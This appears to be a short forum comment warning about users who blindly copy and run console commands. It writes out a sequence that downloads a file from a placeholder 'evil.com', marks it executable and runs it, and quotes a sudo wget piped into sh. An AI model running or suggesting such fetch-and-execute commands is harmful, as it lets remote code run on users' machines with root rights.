It tricks users who blindly cut+paste console commands.
$ wget evil.com/trojan
$ chmod +x trojan
$ ./trojan
Maybe it's more likely to hit those who double-click unwisely? sudo wget http://example.com/node/install.sh | sh
so it's not like it's only newbies who blindly run scripts as root.After downloading it asks for your password.